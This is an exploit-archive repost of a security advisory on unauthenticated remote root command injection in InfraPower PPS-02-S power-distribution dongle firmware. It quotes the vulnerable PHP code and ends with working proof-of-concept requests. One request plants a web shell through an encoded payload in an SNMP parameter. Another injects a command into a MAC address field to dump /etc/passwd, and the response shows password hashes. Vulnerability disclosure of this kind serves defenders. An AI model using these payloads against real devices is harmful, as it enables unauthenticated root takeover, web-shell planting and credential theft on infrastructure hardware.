Home / exploits InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution
Posted on 30 November -0001
<HTML><HEAD><TITLE>InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>InfraPower PPS-02-S Q213V1 Unauthenticated Remote Root Command Execution Vendor: Austin Hughes Electronics Ltd. Product web page: http://www.austin-hughes.com Affected version: Q213V1 (Firmware: V2395S) Fixed version: Q216V3 (Firmware: IPD-02-FW-v03) Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs. Patented IP Dongle provides IP remote access to the PDUs by a true network IP address chain. Only 1xIP dongle allows access to max. 16 PDUs in daisy chain - which is a highly efficient cient application for saving not only the IP remote accessories cost, but also the true IP addresses required on the PDU management. Desc: InfraPower suffers from multiple unauthenticated remote command injection vulnerabilities. The vulnerability exist due to several POST parameters in several scripts not being sanitized when using the exec(), proc_open(), popen() and shell_exec() PHP function while updating the settings on the affected device. This allows the attacker to execute arbitrary system commands as the root user and bypass access controls in place. Tested on: Linux 2.6.28 (armv5tel) lighttpd/1.4.30-devel-1321 PHP/5.3.9 SQLite/3.7.10 Vulnerabiliy discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5372 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5372.php 27.09.2016 -- doupgrate.php: -------------- 09: <? 10: echo "Firmware Upgrate Using NFS:<BR>"; 11: echo "IP=".$_POST["ipaddr"]."<BR>"; 12: echo "Firmware Name=".$_POST["fwname"]."<BR>"; 13: system("sh nfs.sh"); 14: echo "Mounting NFS<BR>"; 15: system("mount -t nfs -o nolock ".$_POST["ipaddr"].":".$_POST["nfsdir"]." /nfs"); 16: system("cp /nfs/".$_POST["fwname"]." /"); 17: echo "Flash erasing<BR>"; 18: system("@flash_eraseall /dev/mtd0"); 19: system("cp /".$_POST["fwname"]." /dev/mtd0"); 20: echo "Upgrate done<BR>"; 21: system("umount /nfs"); 22: echo "Reboot system<BR>"; 23: system("reboot"); 24: ?> --------------------------------------------------------------------- IPSettings.php: --------------- 83: $IP_setting = ereg_ip($_POST['IP']); 84: $Netmask_setting = ereg_ip($_POST['Netmask']); 85: $Gateway_setting = ereg_ip($_POST['Gateway']); ... ... 110: $fout = fopen("/mnt/mtd/net_conf", "w"); 111: if($fout){ 112: $output = substr($output, 0, -1); 113: fprintf($fout, "%s", $output); 114: //echo $change_ip.'b'; 115: if($change_ip === '1'){ 116: $str = ''; 117: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str); 118: // echo $str." "; 119: } 120: if($change_gw === '1'){ 121: $str = ''; 122: exec('ip route del default', $str); 123: exec('route add default gw '.$Gateway_setting, $str); 124: // echo $str[0]."a "; 125: } 126: } 127: fclose($fout); ... ... 164: function ereg_ip($ipstring){ 165: $ipstring=trim($ipstring); //移除å‰å¾Œç©ºç™½ 166: //æ ¼å¼éŒ¯èª¤ 167: if(!ereg("^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$",$ipstring))return 0; 168: //內容檢查 169: $ip_segment =split(".",$ipstring); //注æ„一定è¦åŠ "",å¦å‰‡æœƒåˆ†ä¸é–‹ã€‚ 170: foreach($ip_segment as $k =>$v){ 171: if($v >255){ 171: return 0; 172: } 173: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ipä¸çš„0,ex: => 174: } //end foreach 175: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //å°‡å—串$ipè™•ç† 176: return $ipstring; 177: } --------------------------------------------------------------------- Login.php: ---------- 126: $UserName = getConf("/mnt/mtd/web_conf", "UserName"); 127: $Password = getConf("/mnt/mtd/web_conf", "Password"); 128: 129: //echo 'z'.$_POST['ID_User'].';'.$UserName.' Pwd:'.$_POST['ID_Password'].';'.$Password; 130: if($_POST['ID_User'] === $UserName && $_POST['ID_Password'] === $Password){ ... ... 140: $_SESSION['Login'] = $_POST['ID_User']; 141: 142: //Login 143: $loginTime = date("Y-m-d,H:i:s.0,P"); 144: $remoteIP = $_SERVER['REMOTE_ADDR']; 145: //----------SNMP checking ---Ed 20130307------------------------< 146: $SNMPEnable = getConf("/mnt/mtd/snmp_conf", "enable"); 147: if ($SNMPEnable == "1") { 148: $TrapEnable = getConf("/mnt/mtd/snmp_conf", "trap"); 149: if ($TrapEnable == "v2Trap") { 150: $trapTo = getConf("/mnt/mtd/snmp_conf", "IP"); 151: shell_exec('/usr/bin/snmptrap -M /usr/share/snmp/mibs/ -c public -v 2c ' . $trapTo . ' '' InfraPower-MIB::webLogin InfraPower-MIB::objectDateTime s "' . $loginTime . '" InfraPower-MIB::userName s "' . $_POST['ID_User'] . '" InfraPower-MIB::webAccessIpAddress s "' . $remoteIP . '"'); 152: //echo "alert($res);"; 153: } 154: } --------------------------------------------------------------------- Ntp.php: -------- 36: <?php 37: if(empty($_POST['Change'])) 38: $tzone='8'; 39: else 40: { 41: 42: $tzone=$_POST['ID_timezone']; 43: $idx=$tzone+12; 44: echo "update status..."; 45: exec("/usr/bin/ntpclient -s -h"); 46: exec("/usr/bin/zonegen ".$idx); 47: exec("/usr/bin/zic -d /usr/bin/ zonetime"); 48: exec("mv /usr/bin/localtime /etc/localtime"); 49: echo "OK"; 50: } 51: ?> --------------------------------------------------------------------- production_test1.php: --------------------- 4: if( isset($_POST['macAddress']) ) 5: { 6: shell_exec("echo ". $_POST['macAddress'] . " > /mnt/mtd/mac_addr"); 7: $mac = shell_exec("cat /mnt/mtd/mac_addr"); 8: /*$result = $fail; 9: echo $mac . ","; 10: echo $_POST['macAddress']; 11: if( !strcmp($mac,$_POST['macAddress']) ) 12: $result = $success; 13: echo "verify - " . $mac . " - " . $result;*/ 14: echo "verify - " . $mac; 15: 16: exit(); 17: } --------------------------------------------------------------------- SNMP.php: --------- 34: if($_POST["SNMPAgent"] === "Enable"){ 35: exec('kill -9 `ps | grep "snmpd -c /mnt/mtd/snmpd.conf" | cut -c 1-5`'); 36: setConf("/mnt/mtd/snmp_conf", "enable", "1"); 37: 38: if(!empty($_POST["CommuintyString"]) && !empty($_POST["CommuintyWrite"])) 39: { 40: exec("cp /etc/snmpd.conf /mnt/mtd/snmpd.conf"); 41: exec("sed -i s/public/".$_POST["CommuintyString"]."/g /mnt/mtd/snmpd.conf"); 42: setConf("/mnt/mtd/snmp_conf", "pCommunity", $_POST["CommuintyString"]); 43: setSnmpConf(1,$_POST["CommuintyString"]); 44: setSnmpConf(2,$_POST["CommuintyWrite"]); 45: $pCommunity = $_POST["CommuintyString"]; 46: } --------------------------------------------------------------------- System.php: ----------- 86: if(!empty($_POST['ChangeTime']) == "1"){ 87: if(checkdate($_POST['month'], $_POST['day'], $_POST['year']) == 1){ 88: 89: //Ray modify 90: $datetime = date("mdHiY.s", mktime($_POST['hour']-1,$_POST['minute']-1,$_POST['second']-1,$_POST['month'],$_POST['day'],$_POST['year'])); 91: //$datetime = $_POST['month'].$_POST['day'].$_POST['hour'].$_POST['minute'].$_POST['year'].'.'.$_POST['second']; 92: 93: 94: if(isset($_POST['TimeZone'])){ 95: setTimeZone($_POST['TimeZone']); 96: $orgZone = $_POST['TimeZone']; 97: } 98: 99: exec('date '.$datetime); 100: exec('hwclock -w'); 101: exec('hwclock -w -f /dev/rtc1'); ... ... 180: if(isset($_POST['TimeServer'])){ 181: //$TimeServer = ereg_ip($_POST['TimeServer']); 182: if(!empty($_POST['TimeServer'])){ 183: $TimeServer = $_POST['TimeServer']; 184: 185: $returnStr = exec("/usr/bin/ntpclient -s -h ".$TimeServer . " -i 1"); ... ... 286: exec('ifconfig eth0 '.$IP_setting.' netmask '.$Netmask_setting, $str); ... ... 292: exec('route add default gw '.$Gateway_setting, $str); ... ... 336: function ereg_ip($ipstring){ 337: $ipstring=trim($ipstring); //移除å‰å¾Œç©ºç™½ 338: //æ ¼å¼éŒ¯èª¤ 339: if(!ereg("^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$",$ipstring))return 0; 340: //內容檢查 341: $ip_segment =split(".",$ipstring); //注æ„一定è¦åŠ "",å¦å‰‡æœƒåˆ†ä¸é–‹ã€‚ 342: foreach($ip_segment as $k =>$v){ 343: if($v >255){ 344: return 0; 345: } 346: $ip_segment[$k]=(int)$ip_segment[$k]; //消除ipä¸çš„0,ex: => 347: } //end foreach 348: $ipstring ="$ip_segment[0].$ip_segment[1].$ip_segment[2].$ip_segment[3]"; //å°‡å—串$ipè™•ç† 349: return $ipstring; 350: } --------------------------------------------------------------------- UploadEXE.php: -------------- 72: if(isset($_POST['hasFile'])){ 73: if ($_FILES['ExeFile']['error'] > 0){ 74: echo 'Error: ' . $_FILES['FW']['error']; 75: }else{ 76: echo 'File Name: ' . $_FILES['ExeFile']['name'].'<br/>'; ... ... 80: move_uploaded_file($_FILES['ExeFile']['tmp_name'], '/ramdisk/'.$_FILES['ExeFile']['name']); 81: chmod("/ramdisk/".$_FILES['ExeFile']['name'], "0777"); 82: $fp = popen(""/ramdisk/".$_FILES['ExeFile']['name'].""", "r"); --------------------------------------------------------------------- --------------------------------------------------------------------- --------------------------------------------------------------------- #1 -- PoC Request: curl -i -s -k -X 'POST' -H 'User-Agent: ZSL-Injectinator/3.1 (Unix)' -H 'Content-Type: application/x-www-form-urlencoded' --data-binary $'SNMPAgent=Enable&CommuintyString=public|%65%63%68%6f%20%22%3c%3f%70%68%70%20%65%63%68%6f%20%73%79%73%74%65%6d%28%5c%24%5f%47%45%54%5b%27%63%27%5d%29%3b%20%3f%3e%22%20%3Etest251.php%26&CommuintyWrite=private&TrapsVersion=v2Trap&IP=' '' ... curl -k;echo " at ";uname -a Response: root at Linux A320D 2.6.28 #866 PREEMPT Tue Apr 22 16:07:03 HKT 2014 armv5tel unknown #2 -- PoC Request: POST /production_test1.php HTTP/1.1 Host: User-Agent: ZSL-Injectinator/3.1 (Unix) Content-Type: application/x-www-form-urlencoded Connection: close macAddress=ZE:RO:SC:IE:NC:E0;cat /etc/passwd Response: HTTP/1.1 200 OK X-Powered-By: PHP/5.3.9 Content-type: text/html Connection: close Date: Fri, 17 Jan 2003 16:58:52 GMT Server: lighttpd/1.4.30-devel-1321 Content-Length: 751 verify - root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh bin:x:1:1:bin:/bin:/bin/sh daemon:x:2:2:daemon:/usr/sbin:/bin/sh adm:x:3:4:adm:/adm:/bin/sh lp:x:4:7:lp:/var/spool/lpd:/bin/sh sync:x:5:0:sync:/bin:/bin/sync shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh operator:x:11:0:Operator:/var:/bin/sh nobody:x:99:99:nobody:/home:/bin/sh admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh </BODY></HTML>